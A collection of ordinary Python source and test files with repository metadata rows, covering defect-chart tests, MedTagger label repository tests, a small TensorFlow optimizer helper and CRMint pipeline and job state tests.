bugs.index = bugs.index.strftime("%b %Y")
bugs = bugs.to_dict()["Key"]
bugs_by_months = get_defect_submission(dates, "Month")["created_line"]
bugs = {key: bugs[key] for key in bugs if key in bugs_by_months}
assert bugs == bugs_by_months
def test_submission_chart_by_3_months(dates: DataFrame):
bugs = dates.set_index("Created")
bugs.index = bugs.index.strftime("%b %Y")
bugs = bugs.to_dict()["Key"]
bugs_by_months = get_defect_submission(dates, "3 Months")["created_line"]
bugs_by_months.popitem()
bugs = {key: bugs[key] for key in bugs if key in bugs_by_months}
assert bugs == bugs_by_months
def test_submission_chart_by_6_months(dates: DataFrame):
bugs = dates.set_index("Created")
bugs.index = bugs.index.strftime("%b %Y")
bugs = bugs.to_dict()["Key"]
bugs_by_months = get_defect_submission(dates, "6 Months")["created_line"]
bugs_by_months.popitem()
bugs = {key: bugs[key] for key in bugs if key in bugs_by_months}
assert bugs == bugs_by_months
def test_submission_chart_by_year(dates: DataFrame):
bugs = dates.set_index("Created")
bugs.index = bugs.index.strftime("%Y")
bugs = bugs.to_dict()["Key"]
bugs_by_months = get_defect_submission(dates, "Year")["created_line"]
bugs_by_months.popitem()
bugs = {key: bugs[key] for key in bugs if key in bugs_by_months}
assert bugs == bugs_by_months
def test_coordinates_equality(dates: DataFrame):
bugs = dates.set_index("Created")
bugs.index = bugs.index.strftime("%Y")
bugs_by_months = get_defect_submission(dates, "Month")
resolved_line_points = bugs_by_months["resolved_line"].keys()
created_line_points = bugs_by_months["created_line"].keys()
assert set(resolved_line_points) == set(created_line_points)
| 29.462366
| 77
| 0.709489
| 412
| 2,740
| 4.415049
| 0.116505
| 0.082463
| 0.164926
| 0.08851
| 0.873557
| 0.836174
| 0.836174
| 0.836174
| 0.813084
| 0.813084
| 0
| 0.001749
| 0.165328
| 2,740
| 92
| 78
| 29.782609
| 0.793616
| 0
| 0
| 0.654545
| 0
| 0
| 0.086131
| 0
| 0
| 0
| 0
| 0
| 0.127273
| 1
| 0.127273
| false
| 0
| 0.036364
| 0
| 0.163636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0012273fce512ee48c14e0cecd18f6ab26121b2c
| 26
|
py
|
Python
|
dan/__init__.py
|
danagain/tensortrade
|
2eed6c4da09667e4e0536767366b57f2c8cbc5ca
|
[
"Apache-2.0"
] | null | null | null |
dan/__init__.py
|
danagain/tensortrade
|
2eed6c4da09667e4e0536767366b57f2c8cbc5ca
|
[
"Apache-2.0"
] | null | null | null |
dan/__init__.py
|
danagain/tensortrade
|
2eed6c4da09667e4e0536767366b57f2c8cbc5ca
|
[
"Apache-2.0"
] | null | null | null |
from .. import tensortrade
| 26
| 26
| 0.807692
| 3
| 26
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115385
| 26
| 1
| 26
| 26
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
cc44d496f3ed1be122da61177dc1e7e1dd695478
| 6,138
|
py
|
Python
|
backend/tests/functional_tests/test_labels_repository.py
|
kolszewska/MedTagger
|
c691c822dd23a9fb402d1314e7fe2e6bde898e9c
|
[
"Apache-2.0"
] | 71
|
2019-01-31T19:50:31.000Z
|
2022-02-20T07:36:49.000Z
|
backend/tests/functional_tests/test_labels_repository.py
|
kolszewska/MedTagger
|
c691c822dd23a9fb402d1314e7fe2e6bde898e9c
|
[
"Apache-2.0"
] | 379
|
2019-02-16T19:12:01.000Z
|
2022-03-11T23:12:24.000Z
|
backend/tests/functional_tests/test_labels_repository.py
|
kolszewska/MedTagger
|
c691c822dd23a9fb402d1314e7fe2e6bde898e9c
|
[
"Apache-2.0"
] | 16
|
2019-01-31T16:44:39.000Z
|
2022-02-14T15:23:29.000Z
|
"""Tests Labels Repository."""
from typing import Any
from medtagger.database.models import User
from medtagger.definitions import LabelTool
from medtagger.repositories import (
datasets as DatasetsRepository,
label_tags as LabelTagsRepository,
tasks as TasksRepository,
scans as ScansRepository,
labels as LabelsRepository,
users as UsersRepository,
)
from medtagger.types import LabelingTime
def test_get_predefined_label_for_scan_in_task__no_predefined_label(prepare_environment: Any) -> None:
"""Test for fetching Predefined Label that does not exist."""
# Step 1. Prepare a structure for the test
dataset = DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.RECTANGLE], task.id)
scan = ScansRepository.add_new_scan(dataset, 0)
# Step 2. Check if there is no Predefined Label
predefined_label = LabelsRepository.get_predefined_label_for_scan_in_task(scan, task)
assert not predefined_label
def test_get_predefined_label_for_scan_in_task__label_that_is_not_predefined(prepare_environment: Any) -> None:
"""Test for fetching Predefined Label that is not predefined."""
# Step 1. Prepare a structure for the test
dataset = DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.RECTANGLE], task.id)
scan = ScansRepository.add_new_scan(dataset, 0)
user_id = UsersRepository.add_new_user(User('user@medtagger', 'HASH', 'Admin', 'Admin'))
user = UsersRepository.get_user_by_id(user_id)
# Step 2. Add Label which is not predefined
LabelsRepository.add_new_label(scan.id, task.key, user, LabelingTime(0), is_predefined=False)
# Step 3. Check if there is no Predefined Label
predefined_label = LabelsRepository.get_predefined_label_for_scan_in_task(scan, task)
assert not predefined_label
def test_get_predefined_label_for_scan_in_task__predefined_label(prepare_environment: Any) -> None:
"""Test for fetching Predefined Label that exists."""
# Step 1. Prepare a structure for the test
dataset = DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.RECTANGLE], task.id)
scan = ScansRepository.add_new_scan(dataset, 0)
user_id = UsersRepository.add_new_user(User('user@medtagger', 'HASH', 'Admin', 'Admin'))
user = UsersRepository.get_user_by_id(user_id)
# Step 2. Add Label which is predefined
label = LabelsRepository.add_new_label(scan.id, task.key, user, LabelingTime(0), is_predefined=True)
# Step 3. Check if there is is Predefined Label
predefined_label = LabelsRepository.get_predefined_label_for_scan_in_task(scan, task)
assert predefined_label
assert predefined_label.id == label.id
def test_get_predefined_label_for_scan_in_task__predefined_label_for_given_task(prepare_environment: Any) -> None:
"""Test for fetching Predefined Label only for specific Task."""
# Step 1. Prepare a structure for the test
dataset = DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task_left = TasksRepository.add_task('MARK_LEFT', 'Mark Left', 'path/to/image', ['KIDNEYS'], '', [], [])
task_right = TasksRepository.add_task('MARK_RIGHT', 'Mark Right', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.RECTANGLE], task_left.id)
scan = ScansRepository.add_new_scan(dataset, 0)
user_id = UsersRepository.add_new_user(User('user@medtagger', 'HASH', 'Admin', 'Admin'))
user = UsersRepository.get_user_by_id(user_id)
# Step 2. Add Labels for each Task
label_left = LabelsRepository.add_new_label(scan.id, task_left.key, user, LabelingTime(0), is_predefined=True)
label_right = LabelsRepository.add_new_label(scan.id, task_right.key, user, LabelingTime(0), is_predefined=True)
# Step 3. Check if there are these Predefined Labels
predefined_label = LabelsRepository.get_predefined_label_for_scan_in_task(scan, task_left)
assert predefined_label
assert predefined_label.id == label_left.id
predefined_label = LabelsRepository.get_predefined_label_for_scan_in_task(scan, task_right)
assert predefined_label
assert predefined_label.id == label_right.id
def test_get_predefined_brush_label_elements(prepare_environment: Any) -> None:
"""Test for fetching Predefined Brush Label Elements."""
# Step 1. Prepare a structure for the test
dataset = DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
label_tag = LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.RECTANGLE], task.id)
scan = ScansRepository.add_new_scan(dataset, 3)
user_id = UsersRepository.add_new_user(User('user@medtagger', 'HASH', 'Admin', 'Admin'))
user = UsersRepository.get_user_by_id(user_id)
# Step 2. Add Label with Brush Elements
label = LabelsRepository.add_new_label(scan.id, task.key, user, LabelingTime(0), is_predefined=True)
LabelsRepository.add_new_brush_label_element(label.id, 0, 0, 0, b'', label_tag)
LabelsRepository.add_new_brush_label_element(label.id, 1, 0, 0, b'', label_tag)
LabelsRepository.add_new_brush_label_element(label.id, 2, 0, 0, b'', label_tag)
# Step 3. Check if there is is Predefined Label
brush_label_elements = LabelsRepository.get_predefined_brush_label_elements(scan.id, task.id, 0, 3)
assert len(brush_label_elements) == 3
brush_label_elements = LabelsRepository.get_predefined_brush_label_elements(scan.id, task.id, 0, 1)
assert len(brush_label_elements) == 1
| 54.803571
| 116
| 0.752362
| 827
| 6,138
| 5.301088
| 0.112455
| 0.116332
| 0.041058
| 0.043111
| 0.847628
| 0.814325
| 0.813184
| 0.788093
| 0.734033
| 0.703695
| 0
| 0.007375
| 0.138482
| 6,138
| 111
| 117
| 55.297297
| 0.821672
| 0.144835
| 0
| 0.478873
| 0
| 0
| 0.104899
| 0
| 0
| 0
| 0
| 0
| 0.140845
| 1
| 0.070423
| false
| 0
| 0.070423
| 0
| 0.140845
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
cc6e01946635abceb3d454d194b3c9952e000ba3
| 17
|
py
|
Python
|
l8/__init__.py
|
alastair/l8-python
|
8e2a2559ef8c160cc887a9bbcb34c2f3f01ce1d7
|
[
"BSD-2-Clause"
] | 1
|
2017-05-27T14:02:24.000Z
|
2017-05-27T14:02:24.000Z
|
l8/__init__.py
|
alastair/l8-python
|
8e2a2559ef8c160cc887a9bbcb34c2f3f01ce1d7
|
[
"BSD-2-Clause"
] | null | null | null |
l8/__init__.py
|
alastair/l8-python
|
8e2a2559ef8c160cc887a9bbcb34c2f3f01ce1d7
|
[
"BSD-2-Clause"
] | 1
|
2020-11-24T10:44:57.000Z
|
2020-11-24T10:44:57.000Z
|
from l8 import *
| 8.5
| 16
| 0.705882
| 3
| 17
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 0.235294
| 17
| 1
| 17
| 17
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
cc95ab89f3738d79f03c342ebf3af1f4fbb321cb
| 89
|
py
|
Python
|
tftf/models/optimizers/adagrad.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | 35
|
2018-08-11T05:01:41.000Z
|
2021-01-29T02:28:47.000Z
|
tftf/models/optimizers/adagrad.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | null | null | null |
tftf/models/optimizers/adagrad.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | 4
|
2018-10-19T14:12:04.000Z
|
2021-01-29T02:28:49.000Z
|
import tensorflow as tf
def adagrad(lr=0.01):
return tf.train.AdagradOptimizer(lr)
| 14.833333
| 40
| 0.741573
| 14
| 89
| 4.714286
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 0.157303
| 89
| 5
| 41
| 17.8
| 0.84
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
ccac31b2a41dcd20f558ec536b214d4cf8900c3d
| 19,433
|
py
|
Python
|
backends/tests/integration/core/models_tests.py
|
sneub/crmint
|
e2b475b94cdf5b18d8201e9a62d2a12087635219
|
[
"Apache-2.0"
] | null | null | null |
backends/tests/integration/core/models_tests.py
|
sneub/crmint
|
e2b475b94cdf5b18d8201e9a62d2a12087635219
|
[
"Apache-2.0"
] | null | null | null |
backends/tests/integration/core/models_tests.py
|
sneub/crmint
|
e2b475b94cdf5b18d8201e9a62d2a12087635219
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from google.appengine.ext import testbed
import mock
from core import models
from tests import utils
class TestPipelineWithJobs(utils.ModelTestCase):
def setUp(self):
super(TestPipelineWithJobs, self).setUp()
self.testbed = testbed.Testbed()
self.testbed.activate()
# Activate which service we want to stub
self.testbed.init_taskqueue_stub()
self.testbed.init_memcache_stub()
self.testbed.init_app_identity_stub()
def tearDown(self):
super(TestPipelineWithJobs, self).tearDown()
self.testbed.deactivate()
def test_start_fails_without_jobs(self):
pipeline = models.Pipeline.create()
self.assertEqual(pipeline.status, 'idle')
result = pipeline.start()
self.assertEqual(result, False)
self.assertEqual(pipeline.status, 'idle')
def test_start_fails_if_already_running(self):
pipeline = models.Pipeline.create()
pipeline.status = 'running'
pipeline.save()
self.assertEqual(pipeline.status, 'running')
result = pipeline.start()
self.assertEqual(result, False)
self.assertEqual(pipeline.status, 'running')
def test_start_succeeds_with_one_job_idle(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id)
self.assertEqual(pipeline.status, 'idle')
result = pipeline.start()
self.assertEqual(result, True)
self.assertEqual(pipeline.status, 'running')
def test_start_fails_with_one_job_running(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id)
job1.status = 'running'
job1.save()
self.assertEqual(pipeline.status, 'idle')
result = pipeline.start()
self.assertEqual(result, False)
self.assertEqual(pipeline.status, 'idle')
def test_start_succeeds_with_one_job_succeeded(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id)
job1.status = 'succeeded'
job1.save()
self.assertEqual(pipeline.status, 'idle')
result = pipeline.start()
self.assertEqual(result, True)
self.assertEqual(pipeline.status, 'running')
def test_start_succeeds_with_one_job_failed(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id)
job1.status = 'failed'
job1.save()
self.assertEqual(pipeline.status, 'idle')
result = pipeline.start()
self.assertEqual(result, True)
self.assertEqual(pipeline.status, 'running')
@mock.patch('core.logging.logger')
def test_start_fails_with_one_job_not_getting_ready(self, patched_logger):
patched_logger.log_struct.__name__ = 'foo'
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id)
models.Param.create(
job_id=job1.id,
name='field1',
type='number',
value='{% ABC %}') # initialize with a non-boolean value
self.assertEqual(pipeline.status, 'idle')
result = pipeline.start()
self.assertEqual(result, False)
self.assertEqual(pipeline.status, 'idle')
def test_stop_fails_if_not_running(self):
pipeline = models.Pipeline.create(status='idle')
self.assertEqual(pipeline.status, 'idle')
result = pipeline.stop()
self.assertEqual(result, False)
def test_stop_succeeds_and_stop_all_jobs(self):
pipeline = models.Pipeline.create(status='running')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
models.Job.create(pipeline_id=pipeline.id, status='running')
models.Job.create(pipeline_id=pipeline.id, status='running')
self.assertEqual(len(pipeline.jobs.all()), 3)
self.assertEqual(pipeline.jobs[0].status, 'succeeded')
self.assertEqual(pipeline.jobs[1].status, 'running')
self.assertEqual(pipeline.jobs[2].status, 'running')
result = pipeline.stop()
self.assertTrue(result)
self.assertEqual(pipeline.jobs[0].status, 'succeeded')
self.assertEqual(pipeline.jobs[1].status, 'stopping')
self.assertEqual(pipeline.jobs[2].status, 'stopping')
def test_stop_succeeds_if_all_jobs_succeeded(self):
pipeline = models.Pipeline.create(status='running')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
self.assertEqual(len(pipeline.jobs.all()), 3)
result = pipeline.stop()
self.assertTrue(result)
self.assertEqual(pipeline.jobs[0].status, 'succeeded')
self.assertEqual(pipeline.jobs[1].status, 'succeeded')
self.assertEqual(pipeline.jobs[2].status, 'succeeded')
def test_start_single_job_succeeds(self):
pipeline = models.Pipeline.create(status='idle')
job1 = models.Job.create(pipeline_id=pipeline.id)
result = pipeline.start_single_job(job1)
self.assertTrue(result)
self.assertEqual(job1.status, 'running')
self.assertEqual(pipeline.status, 'running')
def test_start_single_job_fails_if_running(self):
pipeline = models.Pipeline.create(status='running')
job1 = models.Job.create(pipeline_id=pipeline.id)
result = pipeline.start_single_job(job1)
self.assertFalse(result)
self.assertEqual(job1.status, 'idle')
self.assertEqual(pipeline.status, 'running')
def test_job_finished_succeeds(self):
pipeline = models.Pipeline.create(status='running')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
result = pipeline.job_finished()
self.assertTrue(result)
self.assertEqual(pipeline.status, 'succeeded')
def test_job_finished_fails_if_one_remains(self):
pipeline = models.Pipeline.create(status='running')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
models.Job.create(pipeline_id=pipeline.id, status='running')
result = pipeline.job_finished()
self.assertFalse(result)
self.assertEqual(pipeline.status, 'running')
def test_job_finished_fails_if_mix_succeeded_and_failed(self):
pipeline = models.Pipeline.create(status='running')
job1 = models.Job.create(pipeline_id=pipeline.id, status='succeeded')
job2 = models.Job.create(pipeline_id=pipeline.id, status='failed')
models.StartCondition.create(job_id=job2.id, preceding_job_id=None)
result = pipeline.job_finished()
self.assertTrue(result)
self.assertEqual(pipeline.status, 'failed')
class TestPipelineDestroy(utils.ModelTestCase):
def test_destroy_succeeds(self):
pipeline = models.Pipeline.create()
pipeline.destroy()
self.assertIsNone(models.Pipeline.find(pipeline.id))
def test_destroy_deletes_all_schedules(self):
pipeline = models.Pipeline.create()
sc1 = models.Schedule.create(pipeline_id=pipeline.id)
self.assertIsNotNone(models.Schedule.find(sc1.id))
pipeline.destroy()
self.assertIsNone(models.Schedule.find(sc1.id))
def test_destroy_deletes_all_jobs(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, name='j1')
self.assertIsNotNone(models.Job.find(job1.id))
pipeline.destroy()
self.assertIsNone(models.Job.find(job1.id))
def test_destroy_deletes_all_params(self):
pipeline = models.Pipeline.create()
param1 = models.Param.create(
pipeline_id=pipeline.id,
name='p1',
type='string')
self.assertIsNotNone(models.Param.find(param1.id))
pipeline.destroy()
self.assertIsNone(models.Param.find(param1.id))
class TestPipelineImport(utils.ModelTestCase):
def test_import_data_succeeds(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create()
job2 = models.Job.create()
data = {
'params': [
{'name': 'p1', 'type': 'string', 'value': 'foo'},
{'name': 'p2', 'type': 'string', 'value': 'bar'},
],
'schedules': [
{'id': None, 'cron': 'NEW1'},
{'id': None, 'cron': 'NEW2'},
],
'jobs': [
{'id': job1.id, 'name': 'j1', 'hash_start_conditions': []},
{'id': job2.id, 'name': 'j2', 'hash_start_conditions': []},
]
}
pipeline.import_data(data)
self.assertEqual(len(pipeline.params.all()), 2)
self.assertEqual(pipeline.params[0].name, 'p1')
self.assertEqual(pipeline.params[0].value, 'foo')
self.assertEqual(pipeline.params[1].name, 'p2')
self.assertEqual(pipeline.params[1].value, 'bar')
self.assertEqual(len(pipeline.jobs.all()), 2)
self.assertEqual(pipeline.jobs[0].name, 'j1')
self.assertEqual(pipeline.jobs[1].name, 'j2')
class TestJobDestroy(utils.ModelTestCase):
def test_destroy_succeeds(self):
job = models.Job.create()
job.destroy()
self.assertIsNone(models.Job.find(job.id))
def test_destroy_deletes_all_starting_conditions(self):
job1 = models.Job.create()
job2 = models.Job.create()
sc1 = models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id)
self.assertIsNotNone(models.StartCondition.find(sc1.id))
job2.destroy()
self.assertIsNone(models.StartCondition.find(sc1.id))
def test_destroy_deletes_preceding_starting_conditions(self):
job1 = models.Job.create()
job2 = models.Job.create()
sc1 = models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id)
self.assertIsNotNone(models.StartCondition.find(sc1.id))
job1.destroy()
self.assertIsNone(models.StartCondition.find(sc1.id))
def test_destroy_deletes_all_params(self):
job = models.Job.create()
param1 = models.Param.create(
job_id=job.id,
name='p1',
type='string')
self.assertIsNotNone(models.Param.find(param1.id))
job.destroy()
self.assertIsNone(models.Param.find(param1.id))
class TestStartConditionWithJobs(utils.ModelTestCase):
def test_value_succeeds(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, name='job1')
job2 = models.Job.create(pipeline_id=pipeline.id, name='job2')
sc1 = models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='success')
self.assertEqual(sc1.value, '%s,success' % job1.id)
def test_preceding_job_name_succeeds(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, name='job1')
job2 = models.Job.create(pipeline_id=pipeline.id, name='job2')
sc1 = models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='success')
self.assertEqual(sc1.preceding_job_name, 'job1')
class TestJobStartConditions(utils.ModelTestCase):
def setUp(self):
super(TestJobStartConditions, self).setUp()
self.testbed = testbed.Testbed()
self.testbed.activate()
# Activate which service we want to stub
self.testbed.init_memcache_stub()
self.testbed.init_app_identity_stub()
self.testbed.init_taskqueue_stub()
def tearDown(self):
super(TestJobStartConditions, self).tearDown()
self.testbed.deactivate()
def test_create_start_conditions_succeeds(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='idle')
job2 = models.Job.create(pipeline_id=pipeline.id, status='idle')
job3 = models.Job.create(pipeline_id=pipeline.id, status='idle')
arg_start_conditions = [
{'preceding_job_id': job1.id, 'condition': 'success'},
{'preceding_job_id': job2.id, 'condition': 'success'},
]
job3.assign_start_conditions(arg_start_conditions)
self.assertEqual(len(job3.start_conditions), 2)
def test_update_start_conditions_succeeds(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='idle')
job2 = models.Job.create(pipeline_id=pipeline.id, status='idle')
job3 = models.Job.create(pipeline_id=pipeline.id, status='idle')
models.StartCondition.create(
job_id=job3.id,
preceding_job_id=job2.id,
condition='fail')
arg_start_conditions = [
{'preceding_job_id': job1.id, 'condition': 'success'},
{'preceding_job_id': job2.id, 'condition': 'success'},
]
self.assertEqual(len(job3.start_conditions), 1)
self.assertEqual(job3.start_conditions[0].condition, 'fail')
job3.assign_start_conditions(arg_start_conditions)
self.assertEqual(len(job3.start_conditions), 2)
self.assertEqual(job3.start_conditions[0].condition, 'success')
self.assertEqual(job3.start_conditions[1].condition, 'success')
def test_fails_if_running(self):
pipeline = models.Pipeline.create()
job = models.Job.create(pipeline_id=pipeline.id, status='running')
result = job.start()
self.assertFalse(result)
def test_succeeds_if_waiting_without_start_conditions(self):
pipeline = models.Pipeline.create()
job = models.Job.create(pipeline_id=pipeline.id, status='waiting')
result = job.start()
self.assertTrue(result)
def test_succeeds_with_start_condition_fulfill_success_with_succeeded(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='succeeded')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='success')
result = job2.start()
self.assertTrue(result)
def test_fails_with_start_condition_unfulfill_success_with_failed(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='failed')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='success')
result = job2.start()
self.assertFalse(result)
self.assertEqual(job2.status, 'failed')
def test_succeeds_with_start_condition_fulfill_fail_with_failed(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='failed')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='fail')
result = job2.start()
self.assertTrue(result)
def test_fails_with_start_condition_unfulfill_fail_with_succeeded(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='succeeded')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='fail')
result = job2.start()
self.assertFalse(result)
self.assertEqual(job2.status, 'failed')
def test_succeeds_with_start_condition_fulfill_whatever_with_failed(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='failed')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='whatever')
result = job2.start()
self.assertTrue(result)
def test_succeeds_with_start_condition_fulfill_whatever_with_succeeded(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='succeeded')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='whatever')
result = job2.start()
self.assertTrue(result)
def test_fails_with_start_condition_unfulfill_whatever_with_running(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='running')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='whatever')
result = job2.start()
self.assertFalse(result)
class TestJobStopConditions(utils.ModelTestCase):
def test_stop_fails_with_idle(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='idle')
result = job1.stop()
self.assertFalse(result)
self.assertEqual(job1.status, 'idle')
def test_stop_fails_with_waiting(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
result = job1.stop()
self.assertTrue(result)
self.assertEqual(job1.status, 'failed')
def test_stop_succeeds_with_running(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='running')
result = job1.stop()
self.assertTrue(result)
self.assertEqual(job1.status, 'stopping')
class TestJobStartWithDependentJobs(utils.ModelTestCase):
def setUp(self):
super(TestJobStartWithDependentJobs, self).setUp()
self.testbed = testbed.Testbed()
self.testbed.activate()
# Activate which service we want to stub
self.testbed.init_memcache_stub()
self.testbed.init_app_identity_stub()
self.testbed.init_taskqueue_stub()
def tearDown(self):
super(TestJobStartWithDependentJobs, self).tearDown()
self.testbed.deactivate()
def test_start_fails_with_dependent_jobs_and_expecting_success(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='failed')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
job3 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='success')
models.StartCondition.create(
job_id=job3.id,
preceding_job_id=job2.id,
condition='success')
result = job2.start()
self.assertFalse(result)
self.assertEqual(job2.status, 'failed')
self.assertEqual(job3.status, 'failed')
def test_start_fails_with_dependent_jobs_and_expecting_fail(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='succeeded')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
